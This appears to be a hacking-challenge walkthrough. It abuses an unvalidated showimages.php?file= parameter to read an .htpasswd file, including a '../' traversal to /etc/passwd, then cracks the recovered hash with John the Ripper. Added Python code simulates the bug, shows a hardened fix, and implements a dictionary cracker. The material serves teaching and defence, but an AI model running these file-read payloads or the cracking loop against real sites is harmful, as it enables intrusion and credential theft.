Now that you know that .htpasswd files store the usernames and password hashes you need to get into the site, the question is how to get hold of that file.
You have to play with the site. After some poking around you will come across this page:
showimages.php?file=bush.txt

The script hands the file parameter straight to a file read with no validation, so the same parameter can be pointed at the password file sitting inside the web tree:

showimages.php?file=images/admin/.htpasswd
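The two requests above are the whole bug: whatever the file parameter names gets read and returned. The script below is an added example, not code from the tutorial or from the site being attacked. It builds a throwaway web root with tempfile that mirrors the page (bush.txt plus images/admin/.htpasswd with the entry quoted on this page), runs the page's two requests plus a ../ traversal through a function that behaves like the original script, and through a hardened version that confines the path to the web root, refuses hidden files, and allows only listed extensions. The function names and the allowed-extension list are assumptions made for the example.

```python
"""Simulation of the showimages.php?file= bug beside a hardened replacement.

Added example: the web root is constructed with tempfile and mirrors the page
(bush.txt plus images/admin/.htpasswd); function names are invented.
"""
from __future__ import annotations

import os
import tempfile
from pathlib import Path

WEBROOT = Path(tempfile.mkdtemp(prefix="showimages_")).resolve()
(WEBROOT / "bush.txt").write_text("just a caption file\n")
(WEBROOT / "images" / "admin").mkdir(parents=True)
# The .htpasswd entry as the page describes it: login, colon, crypt(3) hash.
(WEBROOT / "images" / "admin" / ".htpasswd").write_text("administrator:aH0qcQOVz7e0s\n")

# What the script is meant to serve (assumed; the page's bush.txt is a .txt).
ALLOWED_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif", ".txt"}


def show_file_vulnerable(name: str) -> str:
    """The original behaviour: join the request parameter to the web root and
    read whatever is there.  No confinement, no allow-list."""
    return (WEBROOT / name).read_text()


def show_file_hardened(name: str) -> str:
    """Serve a file only if it (1) stays inside WEBROOT after ../ and symlinks
    are resolved, (2) has no hidden path component such as .htpasswd, and
    (3) carries an allowed extension.  Raises PermissionError otherwise."""
    target = (WEBROOT / name).resolve()
    try:
        inside = os.path.commonpath([str(WEBROOT), str(target)]) == str(WEBROOT)
    except ValueError:  # different drives on Windows: cannot be inside
        inside = False
    if not inside:
        raise PermissionError(f"refused {name!r}: escapes the web root")
    # Confinement alone would still hand out images/admin/.htpasswd, because it
    # lives inside the tree.  Hidden files and non-image extensions are refused.
    if any(part.startswith(".") for part in target.relative_to(WEBROOT).parts):
        raise PermissionError(f"refused {name!r}: hidden file")
    if target.suffix.lower() not in ALLOWED_SUFFIXES:
        raise PermissionError(f"refused {name!r}: extension not allowed")
    if not target.is_file():
        raise FileNotFoundError(name)
    return target.read_text()


def probe(name: str) -> tuple[str, str]:
    """Run one request through both versions and return the (vulnerable,
    hardened) outcomes as short strings so they can be compared side by side."""
    outcomes = []
    for handler in (show_file_vulnerable, show_file_hardened):
        try:
            outcomes.append("served " + repr(handler(name).strip()))
        except OSError as exc:  # PermissionError and FileNotFoundError both land here
            outcomes.append(f"{type(exc).__name__}: {exc}")
    return outcomes[0], outcomes[1]


if __name__ == "__main__":
    for payload in ("bush.txt", "images/admin/.htpasswd", "../../../../etc/passwd"):
        vulnerable, hardened = probe(payload)
        print(f"{payload}\n  original: {vulnerable}\n  hardened: {hardened}")
```

The second check is the one this page illustrates: confining the path to the web root does nothing for a secret that was stored inside the web root. The real fix is to keep .htpasswd outside the document tree altogether and have the script pick files from an allow-list rather than from a client-supplied path.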
The entry in that file gives you the username, administrator, and the password hash aH0qcQOVz7e0s. The hash is 13 characters long with a two-character salt (aH) in front, which is the traditional crypt(3) DES format; it is one-way, so the remaining challenge is to crack it, not to decrypt it.
John the Ripper is a good program for this. Download it and run john.exe from the extracted folder. John reads input lines in login:hash form, the same layout .htpasswd uses, so copy the entry into a text file with no space after the colon (the original tutorial writes p: in front of the hash instead; whatever precedes the colon is only taken as the login name).
Example: administrator:aH0qcQOVz7e0s
john.exe c:/password.txt
The first run auto-detects the hash type and tries to crack it (single-crack, wordlist and incremental modes in turn); the second prints what has been cracked so far from john.pot:
john.exe --show c:/password.txt
John reports the cracked pair: username administrator, password company. Those are the credentials that get you past the .htpasswd protection.
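To make concrete what John is doing with that login:hash line, here is an added example (not from the tutorial and not John's code) of a small dictionary attack on .htpasswd entries. It parses the file, identifies the hash scheme from its shape, and tries each candidate password. It goes a little beyond the page: besides the 13-character DES crypt(3) format seen here (checked through Python's crypt module where the platform provides it, which is deprecated and absent on Windows), it also handles the {SHA} scheme htpasswd -s produces, so the run is verifiable on any platform. The wordlist and the helper names are constructed for the example.

```python
"""Dictionary attack on .htpasswd entries, the way John the Ripper does it.

Added example, not from the page: parse login:hash lines, identify the hash
scheme, and try each candidate password against it.  Wordlist is constructed.
"""
from __future__ import annotations

import base64
import hashlib

try:
    import crypt  # crypt(3); deprecated since 3.11 and missing on Windows
except ImportError:  # pragma: no cover
    crypt = None


def identify(hash_value: str) -> str:
    """Name the scheme from the hash's shape, as John's auto-detection does."""
    if hash_value.startswith("{SHA}"):
        return "sha1"            # htpasswd -s: base64(SHA-1(password)), unsalted
    if hash_value.startswith("$apr1$"):
        return "apr1-md5"        # Apache's MD5 variant (not implemented here)
    if hash_value.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"          # htpasswd -B (not implemented here)
    if len(hash_value) == 13:
        return "descrypt"        # 2-char salt + 11 chars, e.g. aH0qcQOVz7e0s
    return "unknown"


def verify(candidate: str, hash_value: str) -> bool:
    """True if candidate hashes to hash_value under the scheme it is in."""
    scheme = identify(hash_value)
    if scheme == "sha1":
        digest = hashlib.sha1(candidate.encode()).digest()
        return base64.b64encode(digest).decode() == hash_value[len("{SHA}"):]
    if scheme == "descrypt":
        if crypt is None:
            raise RuntimeError("crypt(3) not available on this platform")
        # Traditional DES crypt: the first two characters are the salt, and
        # only the first 8 characters of the password matter.
        return crypt.crypt(candidate, hash_value[:2]) == hash_value
    raise NotImplementedError(f"scheme {scheme!r} not handled by this example")


def parse_htpasswd(text: str) -> list[tuple[str, str]]:
    """Split an .htpasswd file into (login, hash) pairs; blanks/comments skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        login, _, hash_value = line.partition(":")
        entries.append((login, hash_value))
    return entries


def crack(entries: list[tuple[str, str]], wordlist: list[str]) -> dict[str, str | None]:
    """Wordlist mode: for each entry, return the first word that verifies, else None."""
    found: dict[str, str | None] = {}
    for login, hash_value in entries:
        found[login] = None
        for word in wordlist:
            if verify(word, hash_value):
                found[login] = word
                break
    return found


def sha_entry(password: str) -> str:
    """Build a {SHA} hash the way htpasswd -s does (used to make a test entry)."""
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


if __name__ == "__main__":
    # Constructed wordlist; the page's hash is tried only where crypt(3) exists.
    words = ["123456", "password", "admin", "company", "letmein"]
    sample = "administrator:" + sha_entry("company") + "\n"
    print("SHA entry:", crack(parse_htpasswd(sample), words))
    if crypt is not None:
        print("page's DES entry:", crack(parse_htpasswd("administrator:aH0qcQOVz7e0s"), words))
```

John does the same loop far faster, with optimised DES code and its own wordlist and rules, which is why a weak password in a 1970s-era hash format falls in seconds once the file has been read out through the showimages.php bug.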